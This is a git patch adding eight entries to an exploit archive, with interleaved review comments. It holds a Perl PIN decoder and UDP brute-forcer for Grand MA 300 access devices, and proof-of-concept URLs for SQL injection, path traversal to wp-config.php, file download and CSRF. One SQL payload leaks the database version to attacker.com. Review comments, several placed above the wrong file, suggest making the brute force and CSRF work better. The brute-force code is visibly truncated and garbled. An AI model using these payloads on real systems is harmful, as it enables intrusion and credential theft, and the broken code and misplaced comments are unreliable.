From 65e7008d6be4fe70e350253b90d3c84edf9d75a5 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 23 Jan 2016 05:02:05 +0000
Subject: [PATCH] DB: 2016-01-23 8 new exploits
---
files.csv | 8 ++
platforms/multiple/remote/39292.pl | 54 ++++++++++
platforms/multiple/remote/39293.pl | 149 +++++++++++++++++++++++++++
platforms/multiple/webapps/39288.txt | 13 +++
platforms/php/webapps/39287.txt | 9 ++
platforms/php/webapps/39289.txt | 9 ++
platforms/php/webapps/39290.txt | 10 ++
platforms/php/webapps/39291.txt | 7 ++
platforms/php/webapps/39294.txt | 9 ++
9 files changed, 268 insertions(+)
create mode 100755 platforms/multiple/remote/39292.pl
create mode 100755 platforms/multiple/remote/39293.pl
create mode 100755 platforms/multiple/webapps/39288.txt
create mode 100755 platforms/php/webapps/39287.txt
create mode 100755 platforms/php/webapps/39289.txt
create mode 100755 platforms/php/webapps/39290.txt
create mode 100755 platforms/php/webapps/39291.txt
create mode 100755 platforms/php/webapps/39294.txt
diff --git a/files.csv b/files.csv
index 77e430692..ee6da66c8 100755
--- a/files.csv
+++ b/files.csv
@@ -35527,3 +35527,11 @@ id,file,description,date,author,platform,type,port
 39283,platforms/php/webapps/39283.txt,"WordPress FB Gorilla Plugin 'game_play.php' SQL Injection Vulnerability",2014-07-28,Amirh03in,php,webapps,0
 39284,platforms/windows/local/39284.txt,"Oracle HtmlConverter.exe - Buffer Overflow",2016-01-21,hyp3rlinx,windows,local,0
 39285,platforms/linux/local/39285.py,"xWPE 1.5.30a-2.1 - Local Buffer Overflow",2016-01-21,"Juan Sacco",linux,local,0
+39287,platforms/php/webapps/39287.txt,"WordPress WP Content Source Control Plugin 'download.php' Directory Traversal Vulnerability",2014-08-19,"Henri Salo",php,webapps,0
+39288,platforms/multiple/webapps/39288.txt,"ManageEngine Password Manager Pro and ManageEngine IT360 SQL Injection Vulnerability",2014-08-20,"Pedro Ribeiro",multiple,webapps,0
+39289,platforms/php/webapps/39289.txt,"ArticleFR 'id' Parameter SQL Injection Vulnerability",2014-08-20,"High-Tech Bridge",php,webapps,0
+39290,platforms/php/webapps/39290.txt,"MyAwards MyBB Module Cross Site Request Forgery Vulnerability",2014-08-22,Vagineer,php,webapps,0
+39291,platforms/php/webapps/39291.txt,"WordPress KenBurner Slider Plugin 'admin-ajax.php' Arbitrary File Download Vulnerabilitiy",2014-08-24,MF0x,php,webapps,0
+39292,platforms/multiple/remote/39292.pl,"Granding MA300 Traffic Sniffing MitM Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",multiple,remote,0
+39293,platforms/multiple/remote/39293.pl,"Granding MA300 Weak Pin Encryption Brute-force Weakness",2014-08-26,"Eric Sesterhenn",multiple,remote,0
+39294,platforms/php/webapps/39294.txt,"Joomla! Spider Video Player Extension 'theme' Parameter SQL Injection Vulnerability",2014-08-26,"Claudio Viviani",php,webapps,0
diff --git a/platforms/multiple/remote/39292.pl b/platforms/multiple/remote/39292.pl
new file mode 100755
index 000000000..d7f2fe00b
--- /dev/null
+++ b/platforms/multiple/remote/39292.pl
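Review bot: The port column is 0 for 39293 although the script it indexes connects to the device on UDP/4370 (`PeerPort => '4370'` in 39293.pl), so `...,multiple,remote,4370` would describe it better; 39292 is an offline decoder of a captured packet and never opens a socket, so port 0 is defensible there. The 39291 description also carries the typo `Vulnerabilitiy` where every other entry in the hunk spells `Vulnerability`.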
@@ -0,0 +1,54 @@
+source: http://www.securityfocus.com/bid/69390/info
+
+Grand MA 300 is prone to multiple security weaknesses.
+
+Attackers can exploit these issues to disclose the access pin by sniffing network traffic or perform brute-force attacks on pin to gain unauthorized access. This may aid in other attacks.
+
+Grand MA 300 running firmware version 6.60 is vulnerable.
+
+#!/usr/bin/perl
+#
+# This script calculates the original pin based on the pin
+# retrieved on the wire for the Grand MA 300 fingerprint access device
+#
+# look for a UDP packet starting with 0x4E 0x04, the last 4 bytes are the
+# encoded pin
+#
+# written by Eric Sesterhenn
+# http://www.lsexperts.de
+#
+use warnings;
+use strict;
+
+my $cid = 0; # connection id
+my $ret = 0x4B00A987; # pin on the wire
+
+# get gettickcount value (third byte)
+my $gc = ($ret >> 16) & 0xFF;
+
+# set third byte to magic value (so it becomes zero when we xor it later with the magic value)
+$ret = $ret | 0x005A0000;
+
+# xor all, but third byte with last byte of gettickcount
+$ret ^= $gc + ($gc << 8) + ($gc << 24);
+
+# switch the words
+$ret = (($ret & 0xFFFF) << 16) + ($ret >> 16);
+
+# xor with magic value
+$ret ^= 0x4F534B5A;
+
+# substract the connection id
+$ret -= $cid;
+
+my $fin = 0;
+# revert the bits
+for (my $i = 0; $i < 32; $i++) {
+ $fin *= 2;
+ if ($ret & 1) {
+ $fin = $fin + 1;
+ }
+ $ret = $ret / 2;
+}
+
+printf("final: %X \n", $fin);
\ No newline at end of file
diff --git a/platforms/multiple/remote/39293.pl b/platforms/multiple/remote/39293.pl
new file mode 100755
index 000000000..757acae6e
--- /dev/null
+++ b/platforms/multiple/remote/39293.pl
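Review bot: The bit-reversal loop at the end halves with floating-point division, `$ret = $ret / 2;`, so `$ret` turns fractional after the first odd step and the following `$ret & 1` only works because the bitwise operator truncates it back to an integer; `$ret >>= 1;` says what is meant and keeps the value integral (the comment `# revert the bits` should read "reverse"). The advisory prose committed above `#!/usr/bin/perl` is part of the file, so the script does not run as stored; either comment those lines out or note that the usable script starts at the shebang. The captured value and connection id are hard-coded (`my $cid = 0;`, `my $ret = 0x4B00A987;`); accepting them from the command line, e.g. `my $ret = @ARGV ? hex($ARGV[0]) : 0x4B00A987;`, would let the decoder be reused on other captures, and a comment should say where in the sniffed 0x4E 0x04 packet the connection id is read from, since the decoder assumes 0.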
@@ -0,0 +1,149 @@
+source: http://www.securityfocus.com/bid/69390/info
+
+Grand MA 300 is prone to multiple security weaknesses.
+
+Attackers can exploit these issues to disclose the access pin by sniffing network traffic or perform brute-force attacks on pin to gain unauthorized access. This may aid in other attacks.
+
+Grand MA 300 running firmware version 6.60 is vulnerable.
+
+#!/usr/bin/perl
+#
+# This brute-forces the pin of a Grand MA 300 Fingerprint
+# Access device in less than 5 minutes, if the pin
+# is between 1 and 4294967296.
+#
+# written by Eric Sesterhenn
+# http://www.lsexperts.de
+#
+use IO::Socket::INET;
+use strict;
+use warnings;
+
+sub hexd {
+ my ($data) = @_;
+ my $ret = "";
+ for (my $i=0; $i> 8) & 0xFF));
+
+ return $ret;
+}
+
+sub calccrc {
+ my ($packet) = @_;
+ # we pad with zero for packets of uneven length
+ my $newpacket = substr($packet, 0, 2) . substr($packet, 4) . chr(0);
+ my $crc = 0;
+
+ # the crc is the sum of all words in the packet
+ for (my $i = 0; $i 0xFFFF) {
+ $crc = ($crc & 0xFFFF) + ($crc >> 0x10);
+ }
+
+ # negate the checksum
+ $crc = ~$crc & 0xFFFF;
+ return $crc;
+}
+
+sub makepacket {
+ my ($type, $cid, $seqno, $data) = @_;
+ my $crc = calccrc(makeword($type).makeword(0).makeword($cid).makeword($seqno).$data);
+ return makeword($type).makeword($crc).makeword($cid).makeword($seqno).$data;
+}
+
+sub calcpass {
+ my ($pin, $cid) = @_;
+ my $ret = 0;
+
+ # revert the bits
+ for (my $i = 0; $i < 32; $i++) {
+ $ret *= 2;
+ if ($pin & 1) {
+ $ret = $ret + 1;
+ }
+ $pin = $pin / 2;
+ }
+
+ $ret += $cid;
+
+ # xor with magic value
+ $ret ^= 0x4F534B5A;
+
+ # switch the words
+ $ret = (($ret & 0xFFFF) << 16) + ($ret >> 16);
+
+ # xor all, but third byte with last byte of gettickcount
+ my $gc = 0x00;
+ $ret ^= $gc + ($gc << 8) + ($gc << 24);
+
+ # set third byte to last byte of gettickcount
+ # this weakens the algorithm even further, since this byte
+ # is no longer relevant to the algorithm
+ $ret = ($ret & 0xFF000000) + 
($gc << 16) + ($ret & 0xFFFF);
+
+ return $ret;
+}
+
+# flush after every write
+local $| = 1;
+
+my ($socket,$client_socket);
+
+# creating object interface of IO::Socket::INET modules which internally creates
+# socket, binds and connects to the TCP server running on the specific port.
+
+my $data;
+$socket = new IO::Socket::INET (
+ PeerHost => '192.168.1.201', # CHANGEME
+ PeerPort => '4370',
+ Proto => 'udp',
+) or die "ERROR in Socket Creation : $!\n";
+
+# initialize the connection
+$socket->send(makepacket(1000, 0, 0, ""));
+$socket->recv($data, 1024);
+
+my $typ = getword($data, 0);
+my $cid = getword($data, 4);
+if ($typ != 2005) {
+ printf("Client does not need a password");
+ exit(-1);
+}
+
+for (my $i = 0; $i < 65536; $i++) {
+ if (($i % 10) == 0) { printf "$i\n"; }
+ my $pass = calcpass($i, $cid);
+ $socket->send(makepacket(1102, $cid, $i + 1, pack("V", $pass)));
+
+ $socket->recv($data, 1024);
+ $typ = getword($data, 0);
+ if ($typ == 2000) {
+ printf("Found pin: %d\n", $i);
+ exit(0);
+ }
+}
+
+# disconnect
+$socket->send(makepacket(1001, $cid, 2, ""));
+
+$socket->close();
\ No newline at end of file
diff --git a/platforms/multiple/webapps/39288.txt b/platforms/multiple/webapps/39288.txt
new file mode 100755
index 000000000..9df39e20d
--- /dev/null
+++ b/platforms/multiple/webapps/39288.txt
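Review bot: The packet helpers in this hunk are truncated: `hexd` stops at `for (my $i=0; $i> 8) & 0xFF));`, `getword` and `makeword` — both called from `makepacket`, `calccrc` and the main loop — have no definition at all, and the `calccrc` loop header reads `for (my $i = 0; $i 0xFFFF) {`, which looks like everything between a `<` and the next `>` was stripped on the way into the archive; as committed the script cannot compile and should be re-imported from the original source. Separately, the header comment promises pins up to 4294967296, but the loop at the bottom only tries `$i < 65536`, so either the bound or the comment is wrong. `$socket->recv($data, 1024)` on a UDP socket has no timeout, so one lost datagram (in either direction) blocks the brute force forever and the early `exit(0)` never sends the 1001 disconnect. I would bound the wait with `IO::Select` (`use IO::Select;` next to the existing `use IO::Socket::INET;`) and resend the same pin on silence, as below.
```perl
my $sel = IO::Select->new($socket);
for (my $i = 0; $i < 65536; $i++) {
    if (($i % 10) == 0) { printf "$i\n"; }
    my $pass = calcpass($i, $cid);
    $socket->send(makepacket(1102, $cid, $i + 1, pack("V", $pass)));

    # a dropped datagram must not hang the run: wait a bounded time, then resend this pin
    unless ($sel->can_read(2)) {
        warn "no reply for pin $i, resending\n";
        redo;
    }
    $socket->recv($data, 1024);
    # … unchanged: reply-type check and exit(0) on 2000 …
}
```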
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/69303/info
+
+ManageEngine Password Manager Pro and ManageEngine IT360 are prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following products are affected:
+
+ManageEngine Password Manager Pro 5 through 7 build 7003
+ManageEngine IT360 8 through 10.1.1 build 10110
+
+www.example.com/MetadataServlet.dat?sv=[SQLi]
+www.example.com/console/MetadataServlet.dat?sv=[SQLi]
\ No newline at end of file
diff --git a/platforms/php/webapps/39287.txt b/platforms/php/webapps/39287.txt
new file mode 100755
index 000000000..fd082d3d0
--- /dev/null
+++ b/platforms/php/webapps/39287.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/69278/info
+
+WP Content Source Control plugin for WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
+
+WP Content Source Control 3.0.0 is vulnerable; other versions may also be affected.
+
+www.example.com/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php
\ No newline at end of file
diff --git a/platforms/php/webapps/39289.txt b/platforms/php/webapps/39289.txt
new file mode 100755
index 000000000..8e07d4629
--- /dev/null
+++ b/platforms/php/webapps/39289.txt
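Review bot: The advisory lists the last affected builds (`build 7003`, `build 10110`) but names no fixed build, so a reader cannot tell whether the next release closes the hole; a line such as `Fixed in: <build>` should be added once confirmed. It also does not say whether `MetadataServlet.dat` is reachable without a login, which decides whether this is a pre-auth issue — that is the first thing a tester will ask, and the two URLs do not answer it. Which of the two paths belongs to which product is left implicit as well.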
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/69307/info
+
+ArticleFR is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ArticleFR 3.0.4 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/rate.php?act=get&id=0%20union%20select%201,(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHA R(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(1 11),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))%20--%202
\ No newline at end of file
diff --git a/platforms/php/webapps/39290.txt b/platforms/php/webapps/39290.txt
new file mode 100755
index 000000000..aea9f5a08
--- /dev/null
+++ b/platforms/php/webapps/39290.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/69386/info
+
+MyAwards module for MyBB is prone to a cross-site request-forgery vulnerability.
+
+An attacker may exploit this issue to perform certain unauthorized actions. This may lead to further attacks.
+
+Versions prior to MyAwards 2.4 are vulnerable.
+
+https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2
+https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1
\ No newline at end of file
diff --git a/platforms/php/webapps/39291.txt b/platforms/php/webapps/39291.txt
new file mode 100755
index 000000000..a08b50a3c
--- /dev/null
+++ b/platforms/php/webapps/39291.txt
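Review bot: The PoC URL contains `CHA R(101)` and `CHAR(1 11)`, stray spaces that look like line-wrap artifacts from the source advisory; as committed the payload is not valid SQL and will fail when pasted, so they should be `CHAR(101)` and `CHAR(111)`. It would also help to say what the payload does: the `CHAR()` sequence spells `\\<version()>.attacker.com\foobar`, i.e. `load_file()` on a UNC path that exfiltrates the server version out of band via a name lookup, so nothing is returned in the HTTP response, the attacker must control the DNS/SMB endpoint, and the technique only works where the database host will resolve UNC paths and has the `FILE` privilege.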
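Review bot: The two URLs are bare GET requests to the MyBB admin panel; for the CSRF to do anything the victim must already be logged into the ACP with rights over awards, and the hunk neither says so nor shows how the request is triggered from a third-party page. A line like `Requires an authenticated ACP admin to load the URL (e.g. via an <img> tag or link on an attacker page)` would make the PoC usable, and the meaning of `awid` versus `awuid` should be stated, since the second URL drops `awid` without explanation.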
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/69387/info
+
+The KenBurner Slider plugin for WordPress is prone to an arbitrary file-download vulnerability.
+
+An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information.
+
+http://www.example.com/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
\ No newline at end of file
diff --git a/platforms/php/webapps/39294.txt b/platforms/php/webapps/39294.txt
new file mode 100755
index 000000000..2bcc64f74
--- /dev/null
+++ b/platforms/php/webapps/39294.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/69422/info
+
+Spider Video Player extension for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+An attacker may leverage this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Spider Video Player Extension 2.8.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1'
\ No newline at end of file
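Review bot: Unlike the other advisories in this commit, this one names no affected or fixed version of KenBurner Slider, so a reader cannot tell whether a given install is exposed; a line such as `KenBurner Slider <version> is vulnerable; other versions may also be affected.` should be added once known. The PoC goes through `admin-ajax.php`, which WordPress exposes to unauthenticated visitors only for actions registered on the `nopriv` hook; whether `kbslider_show_image` is registered that way is not stated and decides whether this is pre-auth. The single `../` in `img=../wp-config.php` also implies the handler resolves paths relative to a fixed directory one level below the site root, which is worth a sentence so testers know how many levels to traverse.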
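Review bot: The PoC only appends a single quote, `theme=1'`, which at most provokes a database error and does not demonstrate that data can be read or modified as the text claims; a payload whose effect is observable in the response (a condition that is true versus false, for example) would substantiate the claim. The trailing comma in `playlist=1,` is unexplained and should either be removed or noted as required for the query to reach the vulnerable `theme` parameter.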